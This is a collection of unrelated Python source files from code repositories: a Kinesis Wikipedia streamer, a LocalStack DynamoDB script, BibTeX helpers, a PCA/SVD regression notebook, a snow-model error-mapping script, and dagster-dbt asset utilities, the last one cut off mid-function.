{"seq_id":"18027450648","text":"import json\nimport boto3\n\nfrom app_flow.utils.wiki import fetch_latest_wikipedia_data\n\n\ndef run():\n\n    # Create a Kinesis client\n    kinesis_client = boto3.client('kinesis')\n\n    last_timestamp = 0\n\n    while True:\n        for data in fetch_latest_wikipedia_data(last_timestamp):\n\n            # Publish a record to the Kinesis stream\n            response = kinesis_client.put_record(\n                StreamName='demo-kinesis-bench-de',\n                Data=data,\n                PartitionKey='partitionKey-03'\n            )\n\n            print(f\"The message was sent to Kinesis.\")\n            print(f\"Stream Name: demo-kinesis-bench-de\")\n            print(f\"Partition Key: partitionKey-03\")\n            print(f\"Sequence Number: {response['SequenceNumber']}\")\n            print(f\"Shard ID: {response['ShardId']}\")\n            print(f\"Data: {data}\")\n\n            change = json.loads(data)\n            last_timestamp = int(change.get(\"timestamp\", last_timestamp))\n\n\nrun()\n","repo_name":"leonardohss0/data-streaming-with-kinesis","sub_path":"app_flow/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"3841816239","text":"import json\nimport logging\nfrom datetime import date, datetime\nimport os\nimport boto3\nfrom botocore.exceptions import ClientError\n\"\"\"\nawsls dynamodb list-tables\n\n\"\"\"\nAWS_REGION = 'eu-central-1'\nAWS_PROFILE = 'localstack_dev'\nENDPOINT_URL = 'http://localhost:4566'\n\n\nlogger = logging.getLogger()\nlogging.basicConfig(level=logging.INFO,\n                    format='%(asctime)s: %(levelname)s: %(message)s')\nboto3.setup_default_session(profile_name=AWS_PROFILE)\ndynamodb_client = boto3.client(\n    \"dynamodb\", 
region_name=AWS_REGION, endpoint_url=ENDPOINT_URL)\n\n\ndef json_datetime_serializer(obj):\n \"\"\"\n Helper method to serialize datetime fields\n \"\"\"\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))\n\n\ndef create_dynamodb_table(table_name):\n \"\"\"\n Creates a DynamoDB table.\n \"\"\"\n try:\n response = dynamodb_client.create_table(\n TableName=table_name,\n KeySchema=[\n {\n 'AttributeName': 'Name',\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': 'Email',\n 'KeyType': 'RANGE'\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'Name',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'Email',\n 'AttributeType': 'S'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n },\n Tags=[\n {\n 'Key': 'Name',\n 'Value': 'localstack-dynamodb-table'\n }\n ])\n except ClientError:\n logger.exception('Could not create the table.')\n raise\n else:\n return response\n\n\ndef main():\n \"\"\"\n Main invocation function.\n \"\"\"\n table_name = 'localstack-dynamodb-table'\n logger.info('Creating a DynamoDB table...')\n dynamodb = create_dynamodb_table(table_name)\n logger.info(\n f'DynamoDB table created: {json.dumps(dynamodb, indent=4, default=json_datetime_serializer)}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Mertozturkk/localstack_template","sub_path":"dynamodb_examples/create_ddb_table.py","file_name":"create_ddb_table.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"1764910281","text":"import pdf2bib\nfrom django.conf import settings\nimport pdf2doi\nimport os\nimport io\nimport urllib.parse\nfrom .bibtex_fields import dict_csl_bib, dict_type_csl_bib\nfrom citeproc import CitationStylesStyle, CitationStylesBibliography\nfrom citeproc import formatter\nfrom citeproc import Citation, CitationItem\n\ndef create_bibtex(path):\n new_path = os.path.join(settings.MEDIA_ROOT, path)\n pdf2bib.config.set('verbose',False)\n # print(f\"NEW PATH: {new_path}\")\n result = pdf2bib.pdf2bib(new_path)\n\n # output_path = os.path.join(settings.MEDIA_ROOT, 'output/1')\n # with io.open(output_path,'w',encoding='utf8') as f:\n # f.write(result['validation_info'])\n print(result)\n return result\n\ndef get_doi(path):\n new_path = os.path.join(settings.MEDIA_ROOT, path)\n result = pdf2doi.pdf2doi(new_path)\n print(result)\n return result\n\ndef test(data):\n for key, value in data.items():\n print(f\"{key}: {value}\")\n return \"bibtex test\"\n\ndef make_bibtex(metadata):\n # data = metadata.copy()\n print(f\"METADATA: {metadata}\")\n data = dict()\n for key, value in dict_csl_bib.items():\n if key in metadata:\n data[value] = metadata[key]\n print(data)\n data['type'] = dict_type_csl_bib.get(metadata['type'])\n print(data)\n if not data['type']:\n return dict()\n if 'pages' in data:\n data['pages'] = data['pages'].replace('-', '--')\n if data['type'] == 'inbook':\n data['booktitle'] = metadata['container-title']\n elif data['type'] == 'article':\n data['journal'] = metadata['container-title']\n if 'issued' in metadata:\n data['year'] = metadata['issued']['date-parts'][0][0]\n if len(metadata['issued']['date-parts'][0]) == 2:\n data['month'] = metadata['issued']['date-parts'][0][1]\n authors_tmp = metadata['author']\n authors = list()\n for author in authors_tmp:\n authors.append(author[\"given\"] + ' ' + author['family'])\n\n id = metadata['id']\n\n #Sanitize the URL\n if 'url' 
in data.keys():\n data['url'] = urllib.parse.unquote(data['url'])\n\n\n if isinstance(authors,list):\n authors_string = \" and \".join([author for author in authors])\n data['author'] = authors_string\n elif isinstance(authors,str):\n data['author'] = authors\n\n #Create the bibtex entry as a string \n metadata_not_to_use = ['type'] #These are temporary metadata, not useful for bibtex\n text = [\"@\"+data['type'].upper()+\"{\" + id]\n result = dict()\n for key, value in data.items():\n if value and not (key in metadata_not_to_use):\n text.append(\"\\t%s = {%s}\" % (key, value))\n result['bibtex'] = (\",\\n\").join(text) + \"\\n\" + \"}\"\n result['id'] = id\n \n return result\n\n# def make_style(id_item, bib_source, style):\n# print(f'id item: {id_item}')\n# print(f'bib source: {bib_source}')\n# style_dir = os.path.join(settings.BASE_DIR, 'csl')\n# style_path = os.path.join(style_dir, style + '.csl')\n# bib_style = CitationStylesStyle(style_path, locale='ru-RU', validate=False)\n# bibliography = CitationStylesBibliography(bib_style, bib_source)\n# citation1 = Citation([CitationItem(id_item)])\n# bibliography.register(citation1)\n# def warn(citation_item):\n# print(\"WARNING: Reference with key '{}' not found in the bibliography.\"\n# .format(citation_item.key))\n\n\n# print('Citations')\n# print('---------')\n\n# print(bibliography.cite(citation1, warn))\n# print('')\n# print('Bibliography')\n# print('------------')\n# result = ''\n# for item in bibliography.bibliography():\n# result = str(item)\n# print(str(item))\n# return result","repo_name":"PavVlada/last_test","sub_path":"publication/bibtex_helpers.py","file_name":"bibtex_helpers.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22075545455","text":"\n# coding: utf-8\n\n# __A (Original Matrix) = u * S * v__\n\n# - A = Input data matrix (m * n)\n# - v = Right singular vectors, holds important, non redundant information on features (r * n)\n# - S (or sigma) = diagnal matrix; contains all of the information about the decomposition processes performed during the compression\n# (r * r)\n# - u = Left singular vectors (m * r)\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn import linear_model\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.decomposition import PCA, TruncatedSVD\n\n\n# In[3]:\n\n\n#Load the boston dataset\nfrom sklearn.datasets import load_boston\nboston = load_boston()\nX = pd.DataFrame(boston.data, columns = boston.feature_names)\ny = pd.DataFrame(boston.target)\n\n\n# In[4]:\n\n\nX.describe()\n\n\n# In[5]:\n\n\nX.info()\n\n\n# In[7]:\n\n\nreg = linear_model.LinearRegression()\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25,\n random_state = 2019)\n\n\n# In[8]:\n\n\nreg.fit(X_train, y_train)\nreg.score(X_test, y_test)\n\n\n# In[23]:\n\n\n#Using pca\npca = PCA(n_components = 10, whiten = 'True')\nx = pca.fit(X).transform(X)\n\n\n# In[24]:\n\n\npca.explained_variance_\n\n\n# In[25]:\n\n\npca_reg = linear_model.LinearRegression()\nX_train, X_test, y_train, y_test = train_test_split(x, y, test_size = 0.25,\n random_state = 2019)\npca_reg.fit(X_train, y_train)\n\n\n# In[26]:\n\n\npca_reg.score(X_test, y_test)\n\n\n# In[29]:\n\n\n#Truncated SVD\nsvd = TruncatedSVD(n_components = 10)\nx = svd.fit(X).transform(X)\nsvd_reg = linear_model.LinearRegression()\nX_train, X_test, y_train, y_test = 
train_test_split(x, y, test_size = 0.25,\n random_state = 2019)\nsvd_reg.fit(X_train, y_train)\n\n\n# In[30]:\n\n\nsvd_reg.score(X_test, y_test)\n\n","repo_name":"JJtheNOOB/PCA-SVD-in-python","sub_path":"Singular Value Decomposition (SVD).py","file_name":"Singular Value Decomposition (SVD).py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5575378713","text":"# Standard modules\nimport matplotlib as mpl\n# mpl.use('Agg')\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport sys\nimport imp\nimport os\nimport cartopy.crs as ccrs\nimport cartopy.io.shapereader as shpreader\nimport seaborn as sns\nplt.rcParams.update({'figure.max_open_warning': 0})\n# SnowCast modules\nimport CHM_functions as chmF\n\n# General plotting settings\nsns.set_style('whitegrid')\nsns.set_context(\"talk\", font_scale=1.5, rc={\"lines.linewidth\": 2.5})\nfig_res = 90 # dpi\n\n# Load in config file\n####### load user configurable paramters here #######\n# Check user defined configuraiton file\nif len(sys.argv) != 3:\n sys.exit('Requires two arguments [configuration file] [chm_run_dir]')\n\n# Get name of configuration file/module\nconfigfile = sys.argv[1]\nchm_run_dir = str(sys.argv[2])\n\nif chm_run_dir=='forecast_CRHO_spinup':\n c_run_dt_in = 'H'\nelif chm_run_dir=='HRDPS_Current_BS':\n c_run_dt_in = 'H'\nelif chm_run_dir=='HRDPS_Historical':\n c_run_dt_in = 'H'\nelif chm_run_dir=='GDPS_Current':\n c_run_dt_in = '3H'\nelse:\n sys.exit('Model run name not found')\n\n# Load in configuration file as module\nX = imp.load_source('',configfile)\n\n# Assign to local variables\ndata_dir = X.data_dir\ngit_dir = X.git_dir\n\nmain_dir = os.path.join(git_dir, 'CHM_Configs', chm_run_dir)\nfig_dir = os.path.join(main_dir , 'figures', 'Error_Maps')\n\n# Make fig dir\nif not os.path.isdir(os.path.join(main_dir, 'figures')):\n os.mkdir(os.path.join(main_dir, 'figures'))\nif not os.path.isdir(fig_dir):\n os.mkdir(fig_dir)\n\n\n\n# Make dictionary of obs:model variable names to compare\n# model:obs\nvars_all = {'AirtemperatureA':'t','AirMoistureContentA':'rh','IncrementalPrecipitationA':'p',\n 'ScalarWindSpeedA':'U_2m_above_srf','DownwardSolarRadiation':'iswr','DownwardTerrestrialRad':'ilwr',\n 'UpwardTerrestrialRad':'ilwr_out',\n 'SnowWaterEquivelentA':'swe','SnowDepthA':'snowdepthavg','WindDirectionatA':'vw_dir',\n 'Time_UTC':'time','staID':'station'}\n\nplot_key = {'ilwr_out':'Outgoing Longwave','T_s_0':'Surface temperature','t':'Air Temperature','rh':'Relative Humidity',\n 'p':'Precipitation','ilwr':'Incoming Longwave','iswr':'Shortwave Radiation',\n 'U_2m_above_srf':'Wind Speed','vw_dir':'Wind Direction','swe':'Snow Water Equivalent','snowdepthavg':'Snowdepth'}\n\nylabel_unit = {'ilwr_out':'W m-2','G':'W m-2','T_s_0':'C','t':'C','rh':'%','p':'m','ilwr':'W m-2','iswr':'W m-2',\n 'U_2m_above_srf':'m/s','vw_dir':'degrees true north','swe':'m','snowdepthavg':'m'}\n\n###################################\n# Load data in\n###################################\n\n# File paths\nfile_in = os.path.join(data_dir, 'QC', 'Hourly_QC.nc') # CRHO and other data\nsnow_survey_in = os.path.join(data_dir, 'CRHO_HIST', 'netcdf', 'CRHO_Snow_Survey_Individual.nc')\nEC_snow_course_in = os.path.join(data_dir, 'EC_Snow_Courses', 'netcdf', 'EC_Snow_Courses.nc')\ndem_file = os.path.join(data_dir, 'Static_data', 'SnowCast.tif')\np_file = os.path.join(data_dir, 'Static_data', 'CAN_adm1.shp')\nc_mod_file = 
os.path.join(main_dir,'points','CHM_pts.nc')\n\n# Load all obs\nOBS_data = xr.open_dataset(file_in, engine='netcdf4') #.load()\n# print(OBS_data.IncrementalPrecipitationA.sum(dim='Time_UTC').sum(dim='staID'))\n\n# Snow surveys\nSS_data = xr.open_dataset(snow_survey_in,engine='netcdf4')\nEC_data = xr.open_dataset(EC_snow_course_in)\n\n# For current exp/folder, get netcdf file\nMod_data = xr.open_dataset(c_mod_file,engine='netcdf4')\n\n# Load in dem\ndem = xr.open_rasterio(dem_file).sel(band=1).drop('band')\n# Provinces\np_sh = list(shpreader.Reader(p_file).geometries())\n\n####################################\n# Modify data\n####################################\n# Rename obs variable names to model variable names\nOBS_data.rename(vars_all, inplace=True);\nEC_data.rename({'staID':'station', 'Time_UTC':'time', 'SnowDepth_point':'snowdepthavg', 'SWE_point':'swe'}, inplace=True);\n# Filling in missing SW values at night (these were negative values that in QC SHOULD have been set to zero)\n# OBS_data['iswr'] = OBS_data['iswr'].fillna(0)\n# print('iswr fill is hack, need to fix upstream')\n\ndt_eval_hr = {'H':1, '3H':3, 'MS':999999, 'W':999999} # This converts resample() strs to int hours. Use 999 if N/A.\n\n#################################################\n# Resample and make common\n#################################################\n\n# Get common obs and model\n(obs_dt_val, mod_dt_val) = chmF.make_common(OBS_data, Mod_data, c_run_dt_in, dt_eval_hr,\n                                            remove_missing=True, percent_nan_allowed=20)\n\n# Memory Clean up\nOBS_data = None\nMod_data = None\n\n\n#############################################################\n# Set up plotting info\n#############################################################\nsta_list = np.sort(mod_dt_val.station)\n\nlat_r = obs_dt_val.Lat.max()-obs_dt_val.Lat.min()\nlon_r = obs_dt_val.Lon.max()-obs_dt_val.Lon.min()\nbdy = 0.2\nbox = [obs_dt_val.Lon.min()-lon_r*bdy, obs_dt_val.Lon.max()+lon_r*bdy, obs_dt_val.Lat.min()-lat_r*bdy, obs_dt_val.Lat.max()+lat_r*bdy]\n\ndem = dem.where(dem>0)\ndem = dem.where((dem.x>box[0]) & (dem.x<box[1]) & (dem.y>box[2]) & (dem.y<box[3]))\n\n# Colormaps for each metric type\ncmap_dict = {'bias':'RdBu', 'rmse':'viridis'}\n\n#############################################################\n# Plot error metrics at stations\n#############################################################\n\n# Example: Hourly bias\nprint(\"Plotting biases\")\nfor cvar in ['t', 'rh', 'U_2m_above_srf', 'p', 'ilwr', 'iswr']:\n    ctype = 'bias'\n    da_metric = chmF.calc_bias(obs_dt_val, mod_dt_val, cvar)\n    if da_metric.notnull().sum() > 1:\n        cvar_units = ylabel_unit[cvar]\n        if cvar=='p':\n            cvar_units='%' # Overwrite as percent\n        cf = chmF.plot_point_metric(dem, da_metric, plot_key[cvar], cvar_units, cmap_dict[ctype], ctype)\n        # Save Figure\n        file_out = os.path.join(fig_dir, cvar+'_'+ctype+'.png')\n        chmF.save_figure(cf, file_out, fig_res)\n    else:\n        print(\"No data for \",cvar,\" skipping plot\")\n\n# Example: Hourly RMSE\nprint(\"Plotting RMSE's\")\nfor cvar in ['t', 'rh', 'U_2m_above_srf', 'p', 'ilwr', 'iswr']:\n    ctype = 'rmse'\n    da_metric = chmF.calc_rmse(obs_dt_val, mod_dt_val, cvar)\n    if da_metric.notnull().sum() > 1:\n        # Make plot\n        cf = chmF.plot_point_metric(dem, da_metric, plot_key[cvar], ylabel_unit[cvar], cmap_dict[ctype], ctype)\n        # Save Figure\n        file_out = os.path.join(fig_dir, cvar+'_'+ctype+'.png')\n        chmF.save_figure(cf, file_out, fig_res)\n    else:\n        print(\"No data for \", cvar, \" skipping plot\")\n\n# Answer specific questions\n\n# What is GEM ISWR error at FRG?\nTS = '2014-11-01'\nTE = '2016-08-30' # Per paper period used\ncvar='iswr'\ncsta=b'FRG'\nplt.figure()\nobs_dt_val[cvar].sel(station=csta).plot()\nmod_dt_val[cvar].sel(station=csta).plot()\nplt.figure()\nplt.scatter(obs_dt_val[cvar].sel(station=csta), mod_dt_val[cvar].sel(station=csta))\n\nprint(\"What is GEM ISWR error at FRG?\")\nhrly_obs = obs_dt_val.fillna(0).sel(time=slice(TS,TE))\nhrly_mod = mod_dt_val.fillna(0).sel(time=slice(TS,TE))\nda_rmse = chmF.calc_rmse(hrly_obs, hrly_mod, 
cvar)\nda_bias = chmF.calc_bias(hrly_obs, hrly_mod, cvar)\nds_r2 = chmF.calc_r2(hrly_obs, hrly_mod, cvar)\nprint(\"At Hourly time steps\")\nprint(csta, \" had rmse of \", da_rmse.sel(station=csta).values)\nprint(csta, \" had bias of \", da_bias.sel(station=csta).values)\nprint(csta, \" had r2 of \", ds_r2.sel(station=csta).values)\n\ndly_obs = obs_dt_val.fillna(0).resample(freq='D', dim='time', how='mean', label='left', skipna=True).sel(time=slice(TS,TE))\ndly_mod = mod_dt_val.fillna(0).resample(freq='D', dim='time', how='mean', label='left', skipna=True).sel(time=slice(TS,TE))\ndly_da_rmse = chmF.calc_rmse(dly_obs, dly_mod, cvar)\ndly_da_bias = chmF.calc_bias(dly_obs, dly_mod, cvar)\ndly_ds_r2 = chmF.calc_r2(dly_obs, dly_mod, cvar)\nprint(\"At Daily time steps\")\nprint(csta, \" had rmse of \", dly_da_rmse.sel(station=csta).values)\nprint(csta, \" had bias of \", dly_da_bias.sel(station=csta).values)\nprint(csta, \" had r2 of \", dly_ds_r2.sel(station=csta).values)\n\n\n# In[11]:\n#\n# fig = plt.figure(figsize=(20, 20))\n# ax1 = plt.axes(projection=ccrs.AlbersEqualArea())\n# # ax1.set_extent(box)\n# ax1.imshow(np.flipud(dem.values), extent=[np.min(dem.x), np.max(dem.x),\n# np.min(dem.y), np.max(dem.y)], aspect=ax1.get_aspect())\n# # ax1.set_title('Elevation')\n# for c_net in set(obs_dt_val.network.values):\n# lat_pts = obs_dt_val.Lat.sel(station=(obs_dt_val.where(obs_dt_val.network == c_net, drop=True).network).station).values\n# lon_pts = obs_dt_val.Lon.sel(station=(obs_dt_val.where(obs_dt_val.network == c_net, drop=True).network).station).values\n# I_not_nan = ~np.isnan(lat_pts) & ~np.isnan(lon_pts)\n# lat_pts = lat_pts[I_not_nan]\n# lon_pts = lon_pts[I_not_nan]\n#\n# ax1.scatter(lon_pts, lat_pts, transform=ccrs.AlbersEqualArea(), s=50, c=cmap_network[c_net], zorder=100,\n# label=c_net) # yc, xc -- lists or numpy arrays\n#\n# # Snow Courses\n# lat_pts = EC_data.Lat.values\n# lon_pts = EC_data.Lon.values\n# I_not_nan = ~np.isnan(lat_pts) & ~np.isnan(lon_pts)\n# lat_pts = lat_pts[I_not_nan]\n# lon_pts = lon_pts[I_not_nan]\n#\n# ax1.scatter(lon_pts, lat_pts, transform=ccrs.AlbersEqualArea(), marker='o', s=50, c='m', zorder=200,\n# label='EC Snow Course') # yc, xc -- lists or numpy arrays\n#\n# ax1.add_geometries(p_sh, ccrs.AlbersEqualArea(),\n# edgecolor='black', facecolor='none', alpha=0.5)\n# plt.legend()\n#\n# plt.show()","repo_name":"NicWayand/SnowCast","sub_path":"Post_Processing/Point_Evals/SnowCast_Spatial_Error_Maps.py","file_name":"SnowCast_Spatial_Error_Maps.py","file_ext":"py","file_size_in_byte":10265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9892322947","text":"import hashlib\nimport textwrap\nfrom typing import (\n TYPE_CHECKING,\n AbstractSet,\n Any,\n Dict,\n FrozenSet,\n List,\n Mapping,\n Optional,\n Sequence,\n Set,\n Tuple,\n cast,\n)\n\nfrom dagster import (\n AssetCheckSpec,\n AssetKey,\n AssetsDefinition,\n AssetSelection,\n AutoMaterializePolicy,\n DagsterInvariantViolationError,\n FreshnessPolicy,\n In,\n MetadataValue,\n Nothing,\n Out,\n RunConfig,\n ScheduleDefinition,\n TableColumn,\n TableSchema,\n _check as check,\n define_asset_job,\n)\nfrom dagster._core.definitions.decorators.asset_decorator import (\n _validate_and_assign_output_names_to_check_specs,\n)\nfrom dagster._utils.merger import merge_dicts\nfrom dagster._utils.warnings import deprecation_warning\n\nfrom .utils import input_name_fn, output_name_fn\n\nif TYPE_CHECKING:\n from .dagster_dbt_translator import (\n 
DagsterDbtTranslator,\n DagsterDbtTranslatorSettings,\n DbtManifestWrapper,\n )\n\nMANIFEST_METADATA_KEY = \"dagster_dbt/manifest\"\nDAGSTER_DBT_TRANSLATOR_METADATA_KEY = \"dagster_dbt/dagster_dbt_translator\"\n\n\ndef get_asset_key_for_model(dbt_assets: Sequence[AssetsDefinition], model_name: str) -> AssetKey:\n \"\"\"Return the corresponding Dagster asset key for a dbt model.\n\n Args:\n dbt_assets (AssetsDefinition): An AssetsDefinition object produced by\n load_assets_from_dbt_project, load_assets_from_dbt_manifest, or @dbt_assets.\n model_name (str): The name of the dbt model.\n\n Returns:\n AssetKey: The corresponding Dagster asset key.\n\n Examples:\n .. code-block:: python\n\n from dagster import asset\n from dagster_dbt import dbt_assets, get_asset_key_for_model\n\n @dbt_assets(manifest=...)\n def all_dbt_assets():\n ...\n\n\n @asset(deps={get_asset_key_for_model([all_dbt_assets], \"customers\")})\n def cleaned_customers():\n ...\n \"\"\"\n check.sequence_param(dbt_assets, \"dbt_assets\", of_type=AssetsDefinition)\n check.str_param(model_name, \"model_name\")\n\n manifest, dagster_dbt_translator = get_manifest_and_translator_from_dbt_assets(dbt_assets)\n\n matching_models = [\n value\n for value in manifest[\"nodes\"].values()\n if value[\"name\"] == model_name and value[\"resource_type\"] == \"model\"\n ]\n\n if len(matching_models) == 0:\n raise KeyError(f\"Could not find a dbt model with name: {model_name}\")\n\n return dagster_dbt_translator.get_asset_key(next(iter(matching_models)))\n\n\ndef get_asset_keys_by_output_name_for_source(\n dbt_assets: Sequence[AssetsDefinition], source_name: str\n) -> Mapping[str, AssetKey]:\n \"\"\"Returns the corresponding Dagster asset keys for all tables in a dbt source.\n\n This is a convenience method that makes it easy to define a multi-asset that generates\n all the tables for a given dbt source.\n\n Args:\n source_name (str): The name of the dbt source.\n\n Returns:\n Mapping[str, AssetKey]: A mapping of the table name to corresponding Dagster asset key\n for all tables in the given dbt source.\n\n Examples:\n .. code-block:: python\n\n from dagster import AssetOut, multi_asset\n from dagster_dbt import dbt_assets, get_asset_keys_by_output_name_for_source\n\n @dbt_assets(manifest=...)\n def all_dbt_assets():\n ...\n\n @multi_asset(\n outs={\n name: AssetOut(key=asset_key)\n for name, asset_key in get_asset_keys_by_output_name_for_source(\n [all_dbt_assets], \"raw_data\"\n ).items()\n },\n )\n def upstream_python_asset():\n ...\n\n \"\"\"\n check.sequence_param(dbt_assets, \"dbt_assets\", of_type=AssetsDefinition)\n check.str_param(source_name, \"source_name\")\n\n manifest, dagster_dbt_translator = get_manifest_and_translator_from_dbt_assets(dbt_assets)\n\n matching_nodes = [\n value for value in manifest[\"sources\"].values() if value[\"source_name\"] == source_name\n ]\n\n if len(matching_nodes) == 0:\n raise KeyError(f\"Could not find a dbt source with name: {source_name}\")\n\n return {\n output_name_fn(value): dagster_dbt_translator.get_asset_key(value)\n for value in matching_nodes\n }\n\n\ndef get_asset_key_for_source(dbt_assets: Sequence[AssetsDefinition], source_name: str) -> AssetKey:\n \"\"\"Returns the corresponding Dagster asset key for a dbt source with a singular table.\n\n Args:\n source_name (str): The name of the dbt source.\n\n Raises:\n DagsterInvalidInvocationError: If the source has more than one table.\n\n Returns:\n AssetKey: The corresponding Dagster asset key.\n\n Examples:\n .. 
code-block:: python\n\n from dagster import asset\n from dagster_dbt import dbt_assets, get_asset_key_for_source\n\n @dbt_assets(manifest=...)\n def all_dbt_assets():\n ...\n\n @asset(key=get_asset_key_for_source([all_dbt_assets], \"my_source\"))\n def upstream_python_asset():\n ...\n \"\"\"\n asset_keys_by_output_name = get_asset_keys_by_output_name_for_source(dbt_assets, source_name)\n\n if len(asset_keys_by_output_name) > 1:\n raise KeyError(\n f\"Source {source_name} has more than one table:\"\n f\" {asset_keys_by_output_name.values()}. Use\"\n \" `get_asset_keys_by_output_name_for_source` instead to get all tables for a\"\n \" source.\"\n )\n\n return next(iter(asset_keys_by_output_name.values()))\n\n\ndef build_dbt_asset_selection(\n dbt_assets: Sequence[AssetsDefinition],\n dbt_select: str = \"fqn:*\",\n dbt_exclude: Optional[str] = None,\n) -> AssetSelection:\n \"\"\"Build an asset selection for a dbt selection string.\n\n See https://docs.getdbt.com/reference/node-selection/syntax#how-does-selection-work for\n more information.\n\n Args:\n dbt_select (str): A dbt selection string to specify a set of dbt resources.\n dbt_exclude (Optional[str]): A dbt selection string to exclude a set of dbt resources.\n\n Returns:\n AssetSelection: An asset selection for the selected dbt nodes.\n\n Examples:\n .. code-block:: python\n\n from dagster_dbt import dbt_assets, build_dbt_asset_selection\n\n @dbt_assets(manifest=...)\n def all_dbt_assets():\n ...\n\n # Select the dbt assets that have the tag \"foo\".\n foo_selection = build_dbt_asset_selection([dbt_assets], dbt_select=\"tag:foo\")\n\n # Select the dbt assets that have the tag \"foo\" and all Dagster assets downstream\n # of them (dbt-related or otherwise)\n foo_and_downstream_selection = foo_selection.downstream()\n\n \"\"\"\n manifest, dagster_dbt_translator = get_manifest_and_translator_from_dbt_assets(dbt_assets)\n from .dbt_manifest_asset_selection import DbtManifestAssetSelection\n\n return DbtManifestAssetSelection(\n manifest=manifest,\n dagster_dbt_translator=dagster_dbt_translator,\n select=dbt_select,\n exclude=dbt_exclude,\n )\n\n\ndef build_schedule_from_dbt_selection(\n dbt_assets: Sequence[AssetsDefinition],\n job_name: str,\n cron_schedule: str,\n dbt_select: str = \"fqn:*\",\n dbt_exclude: Optional[str] = None,\n tags: Optional[Mapping[str, str]] = None,\n config: Optional[RunConfig] = None,\n execution_timezone: Optional[str] = None,\n) -> ScheduleDefinition:\n \"\"\"Build a schedule to materialize a specified set of dbt resources from a dbt selection string.\n\n See https://docs.getdbt.com/reference/node-selection/syntax#how-does-selection-work for\n more information.\n\n Args:\n job_name (str): The name of the job to materialize the dbt resources.\n cron_schedule (str): The cron schedule to define the schedule.\n dbt_select (str): A dbt selection string to specify a set of dbt resources.\n dbt_exclude (Optional[str]): A dbt selection string to exclude a set of dbt resources.\n tags (Optional[Mapping[str, str]]): A dictionary of tags (string key-value pairs) to attach\n to the scheduled runs.\n config (Optional[RunConfig]): The config that parameterizes the execution of this schedule.\n execution_timezone (Optional[str]): Timezone in which the schedule should run.\n Supported strings for timezones are the ones provided by the\n `IANA time zone database ` - e.g. \"America/Los_Angeles\".\n\n Returns:\n ScheduleDefinition: A definition to materialize the selected dbt resources on a cron schedule.\n\n Examples:\n .. 
code-block:: python\n\n from dagster_dbt import dbt_assets, build_schedule_from_dbt_selection\n\n @dbt_assets(manifest=...)\n def all_dbt_assets():\n ...\n\n daily_dbt_assets_schedule = build_schedule_from_dbt_selection(\n [all_dbt_assets],\n job_name=\"all_dbt_assets\",\n cron_schedule=\"0 0 * * *\",\n dbt_select=\"fqn:*\",\n )\n \"\"\"\n return ScheduleDefinition(\n cron_schedule=cron_schedule,\n job=define_asset_job(\n name=job_name,\n selection=build_dbt_asset_selection(\n dbt_assets,\n dbt_select=dbt_select,\n dbt_exclude=dbt_exclude,\n ),\n config=config,\n tags=tags,\n ),\n execution_timezone=execution_timezone,\n )\n\n\ndef get_manifest_and_translator_from_dbt_assets(\n dbt_assets: Sequence[AssetsDefinition],\n) -> Tuple[Mapping[str, Any], \"DagsterDbtTranslator\"]:\n check.invariant(len(dbt_assets) == 1, \"Exactly one dbt AssetsDefinition is required\")\n dbt_assets_def = dbt_assets[0]\n metadata_by_key = dbt_assets_def.metadata_by_key or {}\n first_asset_key = next(iter(dbt_assets_def.metadata_by_key.keys()))\n first_metadata = metadata_by_key.get(first_asset_key, {})\n manifest_wrapper: Optional[\"DbtManifestWrapper\"] = first_metadata.get(MANIFEST_METADATA_KEY)\n if manifest_wrapper is None:\n raise DagsterInvariantViolationError(\n f\"Expected to find dbt manifest metadata on asset {first_asset_key.to_user_string()},\"\n \" but did not. Did you pass in assets that weren't generated by\"\n \" load_assets_from_dbt_project, load_assets_from_dbt_manifest, or @dbt_assets?\"\n )\n\n dagster_dbt_translator = first_metadata.get(DAGSTER_DBT_TRANSLATOR_METADATA_KEY)\n if dagster_dbt_translator is None:\n raise DagsterInvariantViolationError(\n f\"Expected to find dbt translator metadata on asset {first_asset_key.to_user_string()},\"\n \" but did not. 
Did you pass in assets that weren't generated by\"\n \" load_assets_from_dbt_project, load_assets_from_dbt_manifest, or @dbt_assets?\"\n )\n\n return manifest_wrapper.manifest, dagster_dbt_translator\n\n\n###################\n# DEFAULT FUNCTIONS\n###################\n\n\ndef default_asset_key_fn(dbt_resource_props: Mapping[str, Any]) -> AssetKey:\n \"\"\"Get the asset key for a dbt node.\n\n By default, if the dbt node has a Dagster asset key configured in its metadata, then that is\n parsed and used.\n\n Otherwise:\n dbt sources: a dbt source's key is the union of its source name and its table name\n dbt models: a dbt model's key is the union of its model name and any schema configured on\n the model itself.\n \"\"\"\n dagster_metadata = dbt_resource_props.get(\"meta\", {}).get(\"dagster\", {})\n asset_key_config = dagster_metadata.get(\"asset_key\", [])\n if asset_key_config:\n return AssetKey(asset_key_config)\n\n if dbt_resource_props[\"resource_type\"] == \"source\":\n components = [dbt_resource_props[\"source_name\"], dbt_resource_props[\"name\"]]\n else:\n configured_schema = dbt_resource_props[\"config\"].get(\"schema\")\n if configured_schema is not None:\n components = [configured_schema, dbt_resource_props[\"name\"]]\n else:\n components = [dbt_resource_props[\"name\"]]\n\n return AssetKey(components)\n\n\ndef 